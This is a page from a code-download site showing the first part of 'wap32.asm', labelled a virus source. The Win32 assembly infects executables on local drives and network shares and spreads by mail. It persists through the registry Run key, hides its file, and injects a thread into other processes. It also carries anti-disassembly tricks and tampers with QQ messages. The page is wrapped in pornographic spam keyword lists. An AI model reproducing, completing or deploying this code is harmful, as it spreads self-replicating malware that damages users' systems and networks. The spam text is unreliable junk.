亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關于我們
? 蟲蟲下載站

?? wap32.asm

?? 一個病毒源代碼
?? ASM
?? 第 1 頁 / 共 3 頁
字號:
include wap32.inc

ApiAddressList struc
  ;Kernel32.DLL
  KnlLoadLibraryA          dd ?
  KnlCreateMutexA          dd ?
  KnlGetLastError          dd ?
  KnlGetCommandLineA       dd ?
  KnlWinExec               dd ?   
  KnlGetDriveTypeA         dd ?
  KnlSetCurrentDirectoryA  dd ?
  KnlFindFirstFileA        dd ?
  KnlFindNextFileA         dd ? 
  KnlFindClose		   dd ?
  KnlSetFileAttributesA    dd ?
  KnlSetFileTime           dd ? 
  KnlLOpen                 dd ?
  KnlLRead                 dd ?
  KnlLWrite                dd ?
  KnlLSeek                 dd ?
  KnlLClose		   dd ?  
  KnlSleep		   dd ?
  KnlRegisterServiceProc   dd ?
  KnlGetCurrentProcessId   dd ?
  KnlOpenProcess	   dd ?
  KnlWriteProcessMemory	   dd ?
  KnlCreateRemoteThread	   dd ?
  KnlCreateKernelThread	   dd ?
  KnlCloseHandle	   dd ?
  KnlWaitForSingleObject   dd ?
  KnlVirtualAllocEx	   dd ?
  KnlGetSystemDirectoryA   dd ?
  KnlLCreat		   dd ?
  KnlCreateThread	   dd ?
  KnlTerminateThread	   dd ?
  KnlWideCharToMultiByte   dd ?
  KnlGetComputerNameA	   dd ?
  KnlGetSystemTime	   dd ?
  ;User32.DLL
  UserGetWinThreadProcId   dd ?
  UserFindWindowA	   dd ?
  UserMessageBoxA	   dd ?
  UserGetWindow		   dd ?
  UserSendMessageA	   dd ?
  UserwsprintfA		   dd ?
  ;AdvApi32.DLL
  AdvRegOpenKeyA	   dd ?
  AdvRegSetValueExA	   dd ?
  AdvRegQueryValueExA	   dd ?
  AdvRegNotifyChange	   dd ?
  ;Mpr.DLL
  MprWNetOpenEnumA	   dd ?
  MprWNetEnumResourceA     dd ?
  MprWNetCloseEnum         dd ?
  ;WSock32.DLL
  WsWSAStartup		   dd ?
  WsWSACleanup		   dd ?
  Wssend		   dd ?
  Wshtons		   dd ?
  Wsgethostbyname	   dd ?
  Wsconnect		   dd ?
  Wssocket		   dd ?
  Wsclosesocket		   dd ?
  Wsrecv		   dd ?
  ;VirusData		
  DataKnlMzHeader	   dd ? 
  DataVirusSize		   dd ?
  DataRemoteThread	   dd ?
  

ApiAddressList ends

MAX_BUFF_SIZE=1000h
VirusSize=offset VirusEnd-offset Start+10h

extrn MessageBoxA: proc
extrn ExitProcess: proc

.586p
.model flat,stdcall

.data

Start:
	pushad
	call	VirusEnd
NeedDecode:
	mov	esi,[esp+4*8]
	call	PushRunError	;得到意外繼續執行地址
	popad
	PushXXXCode db 68h	;JmpOldApp
	OldEntryRVA dd offset Exit
	ret
	db	0e9h		;靜態反匯編干擾

PushRunError:
	pop	ecx
	call	SetSehFrame
FindKernel32:		
	and	esi,0fffff000h	;得到Kernel.PELoader代碼位置(不精確)
LoopFindKernel32:
	sub	esi,1000h 
	cmp	word ptr[esi],'ZM'	;搜索EXE文件頭
	jnz	short LoopFindKernel32
GetPeHeader:
	movzx	edi,word ptr[esi.PEHeaderOffset]
	add	edi,esi	
	mov	ebp,[edi.fhExportsRVA]
	add	ebp,esi		;得到輸出函數表
	mov	ebx,[ebp.etExportNameList]
	add	ebx,esi		;得到輸出函數名表
	xor	eax,eax		;函數序號計數
	mov	edx,esi		;暫存Kernel32模塊句柄
LoopFindApiStr:
	add	ebx,04
	inc	eax		;增加函數計數
	mov	edi,[ebx]
	add	edi,edx		;得到一個Api函數名字符串
	call	PushStrGetProcAddress
	db	'GetProcAddress',0
PushStrGetProcAddress:
	pop	esi		;得到Api名字字符串
	xor	ecx,ecx
	mov	cl,15		;GetProcAddress串大小
	cld
	rep	cmpsb  
	jnz	short LoopFindApiStr  
	mov	esi,edx 
	mov	ebx,[ebp.etExportOrdlList]
	add	ebx,esi		;取函數序號地址列表
	movzx	ecx,word ptr[ebx+eax*2]
	mov	ebx,[ebp.etExportAddrList]
	add	ebx,esi		;得到Kernel32函數地址列表
	mov	ebx,[ebx+ecx*4]
	add	ebx,esi		;計算GetProcAddress函數地址

	sub	esp,size ApiAddressList+10h	;在堆棧中存放API的地址
	mov	edi,esp
	
	mov	[esp.DataKnlMzHeader],esi

	call	PushKnlApiStr	
LoopRelocKnlApi:
	mov	ebp,ecx
	call	ebx,esi
	cld
	stosd  
	mov	ecx,ebp		;定位Kernel32.dll Api
	loop	LoopRelocKnlApi

	mov	eax,[esp.KnlLoadLibraryA]
	call	PushUser32Str
	db	'USER32.DLL',0
PushUser32Str:
	call	eax
	mov	esi,eax	
	call	PushUser32ApiStr
LoopRelocUser32Api:
	mov	ebp,ecx
	call	ebx,esi
	cld
	stosd  
	mov	ecx,ebp		;定位User32.dll Api
	loop	LoopRelocUser32Api
	
	mov	eax,[esp.KnlLoadLibraryA]
	call	PushAdvApi32Str
	db	'ADVAPI32.DLL',0
PushAdvApi32Str:
	call	eax
	mov	esi,eax
	call	PushAdvApiStr
LoopRelocAdvApi32Api:
	mov	ebp,ecx
	call	ebx,esi
	cld
	stosd  
	mov	ecx,ebp		;定位ADVAPI32.dll Api
	loop	LoopRelocAdvApi32Api

	mov	eax,[esp.KnlLoadLibraryA]
	call	PushMprStr
	db	'MPR.DLL',0
PushMprStr:
	call	eax
	mov	esi,eax
	call	PushMprApiStr
LoopRelocMprApi:
	mov	ebp,ecx
	call	ebx,esi
	cld
	stosd  
	mov	ecx,ebp		;定位MPR.dll Api
	loop	LoopRelocMprApi

	mov	eax,[esp.KnlLoadLibraryA]
	call	PushWsStr
	db	'WSOCK32.DLL',0
PushWsStr:
	call	eax
	mov	esi,eax
	call	PushWsApiStr
LoopRelocWsApi:
	mov	ebp,ecx
	call	ebx,esi
	cld
	stosd  
	mov	ecx,ebp		;定位MPR.dll Api
	loop	LoopRelocWsApi

	mov	esi,esp		;函數調用列表指針,以后固定不變

	call	PushMutexName
	db	'ChineseHacker-2',0
PushMutexName:  
	call	[esi.KnlCreateMutexA],0,0
	call	[esi.KnlGetLastError]
	or	eax,eax		;檢查病毒是否已經運行
	jz	short ExecOldProgram
	int	3;		;人工引發異常執行原程序,JmpOldApp
	db	0e9h		;靜態反匯編干擾

ExecOldProgram:			;加載自己,運行老程序
	call	[esi.KnlGetCommandLineA]
	call	[esi.KnlWinExec],eax,L 01

	call	PushNextRunErrorProc;保護注冊表與創建遠程線程
	mov	esi,esp		;意外繼續執行地址
StartScan:	
	call	PushScanErrorProc;搜索本地與遠程目錄文件
	mov	esi,esp		;恢復函數調用列表指針
	call	[esi.KnlSleep],1000*60;*10
	jmp	short StartScan	;休眠10分鐘重新搜索文件
	db	0e9h		;靜態反匯編干擾
PushScanErrorProc:
	pop	ecx
	call	SetSehFrame

ScanExeFile:
	call	GetFoundFileCallBackAddr
	lea	eax,[edx+offset OptExeFile-offset FoundFileCallBackAddr]	
	mov	[edx],eax	;設置找到文件的處理程序

	call	GetFoundDirCallBackAddr
	lea	eax,[edx+offset OptLocalDir-offset FoundDirCallBackAddr]
	mov	[edx],eax	;設置找到目錄的處理程序

	call	EnumLogDrive	;搜索本地文件,并傳染病毒

	call	GetFoundDirCallBackAddr
	lea	eax,[edx+offset OptNetDir-offset FoundDirCallBackAddr]
	mov	[edx],eax	;設置找到NET目錄的處理程序

	call	EnumNetResource	;搜索遠程文件,并傳染病毒	

ScanMailFile:
	call	GetFoundFileCallBackAddr
	lea	eax,[edx+offset OptMailFile-offset FoundFileCallBackAddr]
	mov	[edx],eax	;設置找到文件的處理程序

	call	GetFoundDirCallBackAddr
	lea	eax,[edx+offset OptLocalDir-offset FoundDirCallBackAddr]
	mov	[edx],eax	;設置找到目錄的處理程序
	call	EnumLogDrive	;搜索本地文件,發郵件

	call	GetFoundDirCallBackAddr
	lea	eax,[edx+offset OptNetDir-offset FoundDirCallBackAddr]
	mov	[edx],eax	;設置找到NET目錄的處理程序

	call	EnumNetResource	;搜索遠程文件,發郵件

CheckRemoteAndWait:
	mov	eax,[esi.DataRemoteThread]
	call	[esi.KnlWaitForSingleObject],eax,1000*60;
	cmp	eax,-1		;睡眠8小時
	jnz	short AddWordToQQMsg
NeedCreateRemote:
	push	esi
	call	PushWaitErrorProc
	pop	esi
	call	GetNetSendMsg
	db	'Net Send * My god! Some one killed ChineseHacker-2 Monitor',0
GetNetSendMsg:
	pop	eax
	call	[esi.KnlWinExec],eax,0
	jmp	short CheckRemoteAndWait
PushWaitErrorProc:
	pop	ecx
	call	SetSehFrame

	call	ProcessProtect	;重新啟動遠程線程保護/內帶意外
	db	0e9h		;靜態反匯編干擾

AddWordToQQMsg:	
	call	GetVirusBaseInRegEdi
GetVirusBaseInRegEdi:
	pop	edi

	mov	eax,[esi.UserFindWindowA];填寫線程用API
	mov	[edi+offset FindWindowA9x2k-offset GetVirusBaseInRegEdi],eax
	mov	eax,[esi.UserGetWindow]
	mov	[edi+offset GetWindow9x2k-offset GetVirusBaseInRegEdi],eax
	mov	eax,[esi.UserSendMessageA]
	mov	[edi+offset SendMessageA9x2k-offset GetVirusBaseInRegEdi],eax
	mov	eax,[esi.KnlSleep]
	mov	[edi+offset Sleep9x2k-offset GetVirusBaseInRegEdi],eax

	lea	eax,[edi+offset SendQQMsg-offset GetVirusBaseInRegEdi]
	push	eax		;創建QQ附加消息線程
	call	[esi.KnlCreateThread],0,0,eax,eax,0,esp
	mov	ebx,eax		;保證SendQQMsg線程活動10分鐘
	pop	eax

CheckRemoteAndWaitAgain:
	mov	eax,[esi.DataRemoteThread]
	call	[esi.KnlWaitForSingleObject],eax,1000*60;
	push	eax		;睡眠10分鐘
	call	[esi.KnlTerminateThread],ebx,0
	pop	eax
	cmp	eax,-1
	jz	short NeedCreateRemoteAgain
	int	3;		;人工意外,繼續搜索文件
	db	0e9h		;靜態反匯編干擾
NeedCreateRemoteAgain:
	push	esi
	call	PushWaitErrorProcAgain
	pop	esi
	jmp	short CheckRemoteAndWaitAgain
PushWaitErrorProcAgain:
	pop	ecx
	call	SetSehFrame

	call	ProcessProtect	;重新啟動遠程線程保護/內帶意外
	db	0e9h		;靜態反匯編干擾

PushNextRunErrorProc:		;保護注冊表與創建遠程線程
	pop	ecx
	call	SetSehFrame

RegisterProtect:
	sub	esp,100h	;構造病毒路徑
	call	BuildVirusPathInStack,esp
	mov	edi,esp
	
	call	[esi.KnlLCreat],edi,10h
	cmp	eax,-1h		;創建獨占文件
	jz	short OptRegister
	mov	ebx,eax	
	call	UnzipVirusToFile;解壓PE文件
	call	[esi.KnlLSeek],ebx,0,0
	call	FixPeFile,ebx	;傳染病毒給PE文件,不關閉文件,防刪除
	mov	edi,esp		;把病毒設置為:隱藏+系統+只讀
	call	[esi.KnlSetFileAttributesA],edi,7h
	
OptRegister:	
	push	eax
	push	esp
	call	PushRegKeyStr
	db	'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
PushRegKeyStr:
	call	[esi.AdvRegOpenKeyA],080000002h
	pop	ebx
	mov	eax,esp
	call	PushKeyNameStr	;修改注冊表,自動Run項目
	db	'Runonce',0
PushKeyNameStr:
	pop	ecx
	call	[esi.AdvRegSetValueExA],ebx,ecx,0,1,eax,100h

	call	GetVirusBaseInEdi	
GetVirusBaseInEdi:
	pop	edi		;得到病毒位置參照偏移量

	mov	eax,[esi.AdvRegQueryValueExA];填寫API地址
	mov	[edi+offset AdvRegQueryValueExA9x2k-offset GetVirusBaseInEdi],eax
	mov	eax,[esi.AdvRegSetValueExA]
	mov	[edi+offset AdvRegSetValueExA9x2k-offset GetVirusBaseInEdi],eax
	mov	eax,[esi.AdvRegNotifyChange]
	mov	[edi+offset AdvRegNotifyChangeKeyValue9x2k-offset GetVirusBaseInEdi],eax

	lea	eax,[edi+offset RegisterProtectProc-offset GetVirusBaseInEdi]		
	push	eax		;創建注冊表監視線程
	call	[esi.KnlCreateThread],0,0,eax,ebx,0,esp
	pop	eax		;不關閉注冊表句柄,監視線程續用

ProcessProtect:			;創建遠程線程
	xor	eax,eax
	mov	[esi.DataRemoteThread],eax

	sub	esp,100h
	call	BuildVirusPathInStack,esp

	call	GetVirusBaseInEdiAgain
GetVirusBaseInEdiAgain:
	pop	edi		;得到病毒位置參照偏移量

	mov	eax,[esi.KnlOpenProcess];填寫API地址
	mov	[edi+offset KnlOpenProcess9x2k-offset GetVirusBaseInEdiAgain],eax
	mov	eax,[esi.KnlWaitForSingleObject]
	mov	[edi+offset KnlWaitForSingleObject9x2k-offset GetVirusBaseInEdiAgain],eax
	mov	eax,[esi.KnlWinExec]
	mov	[edi+offset KnlWinExec9x2k-offset GetVirusBaseInEdiAgain],eax	

	mov	eax,[esi.KnlRegisterServiceProc]
	or	eax,eax		;依靠函數RehSvrProc來假定操作系統類別9x/2k
	jz	short Process2kProtect	

Process9xProtect:
	call	eax,L 0,L 1	;在Win9x下先隱藏本進程,一級保護

	mov	edx,[esi.DataKnlMzHeader]
	movzx	ebx,word ptr[edx.PEHeaderOffset]
	add	ebx,edx
	mov	ecx,[ebx.fhObjectTable00.otRVA]
	mov	ebp,[ebx.fhHeaderSize]
	sub	ecx,ebp
	cmp	ecx,200h
	jb	short Process9xProtectEnd
	add	ebp,edx		;查詢Knl空間

	lea	edx,[edi+offset ProcessProtectProc-offset GetVirusBaseInEdiAgain]	
	call	MoveDataToKnl,edx,ebp,ProcessProtectProcSize
	lea	ecx,[ebp+ProcessProtectProcSize]
	mov	edx,esp		;復制線程代碼數據到Kernel32.dll
	call	MoveDataToKnl,edx,ecx,100h

	call	[esi.KnlGetCurrentProcessId]
	push	eax		;創建Kernel線程,未公開函數
	call	[esi.KnlCreateKernelThread],0,0,ebp,eax,0,esp
	mov	[esi.DataRemoteThread],eax
	pop	eax		;啟動進程保護線程
	
	call	[esi.KnlSleep],500

Process9xProtectEnd:
	int	3		;人工異常
	db	0e9h		;反匯編干擾	

Process2kProtect:		;填寫API地址
	call	[esi.UserFindWindowA],0,0
	push	eax		;找Explorer進程/或者Top窗口程序
	call	[esi.UserGetWinThreadProcId],eax,esp   
	call	[esi.KnlOpenProcess],PROCESS_ALL_ACCESS,0
	or	eax,eax		;打開該進程
	jz	short Process2kProtectEnd
	mov	ebx,eax
	call	[esi.KnlVirtualAllocEx],ebx,NULL,200h,MEM_COMMIT,L 40h
	or	eax,eax
	jz	short Close2kHandle
	mov	ebp,eax		;分配遠程空間

	lea	edx,[edi+offset ProcessProtectProc-offset GetVirusBaseInEdiAgain]
	push	eax
	call	[esi.KnlWriteProcessMemory],ebx,ebp,edx,ProcessProtectProcSize,esp
	pop	eax		;復制代碼到遠程地址空間
	cmp	eax,ProcessProtectProcSize
	jnz	short Close2kHandle
		
	mov	edx,esp
	lea	ecx,[ebp+ProcessProtectProcSize]
	push	eax
	call	[esi.KnlWriteProcessMemory],ebx,ecx,edx,100h,esp
	call	[esi.KnlGetCurrentProcessId]
	call    [esi.KnlCreateRemoteThread],ebx,NULL,NULL,ebp,eax,NULL,esp
	mov	[esi.DataRemoteThread],eax
	pop	eax		;啟動進程保護線程	

Close2kHandle:
	call	[esi.KnlCloseHandle],ebx
	call	[esi.KnlSleep],500

Process2kProtectEnd:
	int	3		;人工異常
	db	0e9h		;反匯編干擾
	
PushKnlApiStr:	;:ecx=函數名個數	
	pop	eax		;彈出返回地址
	mov	ecx,esp
	call	PushKnlApiStr33
	db	'GetSystemTime',0
PushKnlApiStr33:
	call	PushKnlApiStr32
	db	'GetComputerNameA',0
PushKnlApiStr32:
	call	PushKnlApiStr31
	db	'WideCharToMultiByte',0
PushKnlApiStr31:
	call	PushKnlApiStr30
	db	'TerminateThread',0
PushKnlApiStr30:
	call	PushKnlApiStr29
	db	'CreateThread',0
PushKnlApiStr29:
	call	PushKnlApiStr28
	db	'_lcreat',0
PushKnlApiStr28:
	call	PushKnlApiStr27
	db	'GetSystemDirectoryA',0
PushKnlApiStr27:
	call	PushKnlApiStr26
	db	'VirtualAllocEx',0
PushKnlApiStr26:
	call	PushKnlApiStr25
	db	'WaitForSingleObject',0
PushKnlApiStr25:
	call	PushKnlApiStr24
	db	'CloseHandle',0
PushKnlApiStr24:
	call	PushKnlApiStr23
	db	'CreateKernelThread',0
PushKnlApiStr23:
	call	PushKnlApiStr22
	db	'CreateRemoteThread',0
PushKnlApiStr22:
	call	PushKnlApiStr21
	db	'WriteProcessMemory',0
PushKnlApiStr21:

	call	PushKnlApiStr20
	db	'OpenProcess',0
PushKnlApiStr20:
	call	PushKnlApiStr19
	db	'GetCurrentProcessId',0
PushKnlApiStr19:
	call	PushKnlApiStr18
	db	'RegisterServiceProcess',0
PushKnlApiStr18:    
	call	PushKnlApiStr17
	db	'Sleep',0
PushKnlApiStr17:    
	call	PushKnlApiStr16
	db	'_lclose',0
PushKnlApiStr16:  
	call	PushKnlApiStr15
	db	'_llseek',0
PushKnlApiStr15:  
	call	PushKnlApiStr14
	db	'_lwrite',0
PushKnlApiStr14:  
	call	PushKnlApiStr13
	db	'_lread',0
PushKnlApiStr13:  
	call	PushKnlApiStr12
	db	'_lopen',0
PushKnlApiStr12:
	call	PushKnlApiStr11
	db	'SetFileTime',0
PushKnlApiStr11:
	call  PushKnlApiStr10
	db	'SetFileAttributesA',0
PushKnlApiStr10:
	call	PushKnlApiStr09
	db	'FindClose',0
PushKnlApiStr09:
	call	PushKnlApiStr08
	db	'FindNextFileA',0
PushKnlApiStr08:
	call	PushKnlApiStr07
	db	'FindFirstFileA',0
PushKnlApiStr07:
	call	PushKnlApiStr06
	db	'SetCurrentDirectoryA',0
PushKnlApiStr06:
	call	PushKnlApiStr05
	db	'GetDriveTypeA',0
PushKnlApiStr05:
	call	PushKnlApiStr04
	db	'WinExec',0
PushKnlApiStr04:
	call	PushKnlApiStr03
	db	'GetCommandLineA',0
PushKnlApiStr03:
	call	PushKnlApiStr02
	db	'GetLastError',0
PushKnlApiStr02:
	call	PushKnlApiStr01
	db	'CreateMutexA',0
PushKnlApiStr01:
	call	PushKnlApiStr00
	db	'LoadLibraryA',0
PushKnlApiStr00:
	sub	ecx,esp
	shr	ecx,2
	jmp	eax
	db	0e9h		;靜態反匯編干擾

PushUser32ApiStr:
	pop	eax
	mov	ecx,esp
	call	PushUser32ApiStr05
	db	'wsprintfA',0
PushUser32ApiStr05:   
	call	PushUser32ApiStr04
	db	'SendMessageA',0
PushUser32ApiStr04:   
	call	PushUser32ApiStr03
	db	'GetWindow',0
PushUser32ApiStr03:   
	call	PushUser32ApiStr02
	db	'MessageBoxA',0

?? 快捷鍵說明

復制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
国产亚洲人成网站| 亚洲国产精品久久久久秋霞影院| 亚洲天堂久久久久久久| 天堂久久一区二区三区| 成人av动漫在线| 精品久久五月天| 丝袜亚洲另类欧美| 99久久久国产精品| 久久久99精品久久| 玖玖九九国产精品| 欧美日韩精品专区| 亚洲美女视频一区| 成人在线一区二区三区| 亚洲成人自拍一区| 91亚洲永久精品| 国产精品久久久一区麻豆最新章节| 捆绑变态av一区二区三区| 欧美性色黄大片| 亚洲成人自拍网| 欧美视频三区在线播放| 亚洲精品成人悠悠色影视| 从欧美一区二区三区| 久久久久88色偷偷免费| 久久99精品久久久久婷婷| 51久久夜色精品国产麻豆| 亚洲电影欧美电影有声小说| 欧美日免费三级在线| 亚洲精品国产视频| 在线观看日韩av先锋影音电影院| 亚洲三级免费电影| 99re免费视频精品全部| 国产精品精品国产色婷婷| 成人少妇影院yyyy| 亚洲欧洲日本在线| 色欧美片视频在线观看| 亚洲乱码中文字幕综合| 欧美日韩一区二区三区不卡| 亚洲大片在线观看| 91精品国产欧美一区二区成人| 色婷婷激情久久| 国产精品第四页| 91视频xxxx| 亚洲成人1区2区| 精品美女在线播放| 成人午夜免费电影| 一区二区三区中文字幕| 欧美性猛交xxxx乱大交退制版| 天堂av在线一区| 日韩欧美国产三级| 成人久久久精品乱码一区二区三区| 国产精品久久久久久久久免费丝袜| 91网址在线看| 秋霞午夜鲁丝一区二区老狼| 久久久久青草大香线综合精品| 国产成人一区在线| 中文字幕一区二区三区蜜月| 色婷婷综合久久久| 日本va欧美va欧美va精品| 国产午夜精品一区二区三区嫩草 | 日本一区中文字幕 | 欧美私人免费视频| 轻轻草成人在线| 久久免费看少妇高潮| 99精品久久99久久久久| 首页国产欧美久久| 国产精品久久综合| 欧美日韩在线三区| 国内精品免费**视频| 亚洲啪啪综合av一区二区三区| 欧美一区二区免费视频| 成人黄色在线网站| 午夜精品一区在线观看| 中文字幕欧美区| 6080国产精品一区二区| 高清成人免费视频| 天天色综合天天| 国产午夜亚洲精品不卡| 欧美美女视频在线观看| 国产精品99久久久久久似苏梦涵| 一区二区三区国产豹纹内裤在线| 精品国产免费一区二区三区香蕉| 日本道色综合久久| 国产凹凸在线观看一区二区| 亚洲午夜久久久久久久久电影院| 国产性色一区二区| 3d成人h动漫网站入口| 99re在线视频这里只有精品| 国产在线视视频有精品| 午夜婷婷国产麻豆精品| 亚洲欧美日韩人成在线播放| 久久久精品国产免大香伊| 欧美一区二区福利视频| 在线观看日韩国产| 9人人澡人人爽人人精品| 九色综合狠狠综合久久| 日韩精品一二三四| 亚洲一区二区三区小说| 国产精品理伦片| 国产偷国产偷精品高清尤物| 精品精品欲导航| 欧美日韩一区二区电影| 在线观看精品一区| 色综合久久九月婷婷色综合| 99精品久久99久久久久| www.66久久| 91亚洲精华国产精华精华液| 丰满少妇在线播放bd日韩电影| 国产在线观看一区二区| 国产一区二区按摩在线观看| 激情欧美一区二区三区在线观看| 日韩av电影免费观看高清完整版在线观看| 一级做a爱片久久| 亚洲靠逼com| 亚洲一二三区视频在线观看| 亚洲一区二区高清| 亚洲mv大片欧洲mv大片精品| 亚洲成人资源在线| 天天综合色天天综合| 丝袜美腿亚洲一区二区图片| 日韩福利视频网| 久久99热99| 国产伦精一区二区三区| 国产成人免费在线观看不卡| 成人午夜碰碰视频| 99精品欧美一区二区三区综合在线| 99久久久精品| 精品视频一区 二区 三区| 欧美一区二区三区精品| 精品国产123| 国产精品妹子av| 一区二区三区日韩精品| 亚洲成人动漫在线免费观看| 免费日韩伦理电影| 国产精品1区2区3区在线观看| www.性欧美| 欧美三级一区二区| 日韩免费性生活视频播放| 国产人妖乱国产精品人妖| 中文字幕亚洲一区二区va在线| 亚洲综合在线观看视频| 麻豆精品蜜桃视频网站| 高清shemale亚洲人妖| 日本韩国欧美在线| 91精品国产色综合久久ai换脸 | 日韩激情在线观看| 国产一区二区日韩精品| 91视频观看视频| 精品裸体舞一区二区三区| 中文字幕制服丝袜一区二区三区 | 欧美一级专区免费大片| 国产欧美精品日韩区二区麻豆天美| 亚洲人妖av一区二区| 日本成人在线看| av在线播放成人| 精品国产人成亚洲区| 一区二区视频在线| 国产尤物一区二区| 欧美色精品在线视频| 久久久国产精华| 五月婷婷综合网| caoporm超碰国产精品| 日韩欧美中文字幕制服| 亚洲精品国产成人久久av盗摄| 韩国午夜理伦三级不卡影院| 欧美三片在线视频观看| 国产日本亚洲高清| 欧美aaaaaa午夜精品| 色偷偷88欧美精品久久久| 久久久久久久久久久久电影| 午夜av一区二区| 91免费观看国产| 久久久久国产精品人| 蜜臀av性久久久久蜜臀aⅴ| 91精品1区2区| 亚洲欧洲在线观看av| 国产精品一区二区视频| 欧美成人女星排行榜| 亚洲成年人影院| 欧洲一区二区三区在线| 亚洲国产精品t66y| 久久99精品国产麻豆婷婷洗澡| 欧美日韩日本视频| 亚洲一区在线观看网站| 北岛玲一区二区三区四区| 日本一区二区在线不卡| 久久99九九99精品| 日韩精品一区二区三区蜜臀| 午夜精品久久久| 欧美午夜精品一区二区三区| 一区二区视频免费在线观看| 91免费观看在线| 亚洲精品乱码久久久久久黑人| 不卡一区在线观看| 中文字幕精品一区| 高清久久久久久| 自拍偷自拍亚洲精品播放| youjizz国产精品| 一区二区三区四区不卡视频| 色综合天天综合网天天看片| 亚洲欧美日韩小说|